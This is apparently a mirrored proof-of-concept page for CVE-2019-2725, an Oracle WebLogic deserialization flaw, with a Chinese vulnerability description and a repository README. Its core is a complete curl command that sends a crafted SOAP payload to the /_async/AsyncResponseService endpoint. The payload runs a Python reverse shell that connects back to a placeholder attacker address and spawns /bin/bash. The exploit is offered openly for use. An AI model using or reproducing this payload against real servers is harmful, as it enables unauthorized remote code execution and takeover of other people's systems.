Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2019-2725 PoC — Oracle Fusion Middleware WebLogic Server组件访问控制错误漏洞

Source
https://github.com/CalegariMindSec/Exploit-CVE-2019-2725
Associated Vulnerability
Title:Oracle Fusion Middleware WebLogic Server组件访问控制错误漏洞 (CVE-2019-2725)
Description:Oracle Fusion Middleware(Oracle融合中间件)是美国甲骨文(Oracle)公司的一套面向企业和云环境的业务创新平台。该平台提供了中间件、软件集合等功能。WebLogic Server是其中的一个适用于云环境和传统环境的应用服务器组件。 部分版本WebLogic中默认包含的wls9_async_response包,为WebLogicServer提供异步通讯服务。由于该WAR包在反序列化处理输入信息时存在缺陷,攻击者可以发送精心构造的恶意HTTP请求,获得目标服务器的权限,在未授权
Description
A simple exploit for CVE-2019-2725.
Readme
# Exploit-CVE-2019-2725
A simple exploit for CVE-2019-2725.

  * Example Code:

```
curl -X POST https://127.0.0.1/_async/AsyncResponseService -H "Content-Type: text/xml" -d '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
    <soapenv:Header>
        <wsa:Action>xx</wsa:Action>
        <wsa:RelatesTo>xx</wsa:RelatesTo>
        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
            <void class="java.lang.ProcessBuilder">
                <array class="java.lang.String" length="3">
                    <void index="0">
                        <string>/bin/bash</string>
                    </void>
                    <void index="1">
                        <string>-c</string>
                    </void>
                    <void index="2">
                        <string> python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"MY_IP\",MY_PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")" </string>
                    </void>
                </array>
            <void method="start"/></void>
        </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body>
    <asy:onAsyncDelivery/>
    </soapenv:Body>
</soapenv:Envelope>' -k
```
File Snapshot

 [4.0K]  /data/pocs/60a5a04f4844062887242de46617cb86983baef0
├── [1.4K]  README.md
└── [1.1K]  shell.sh

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.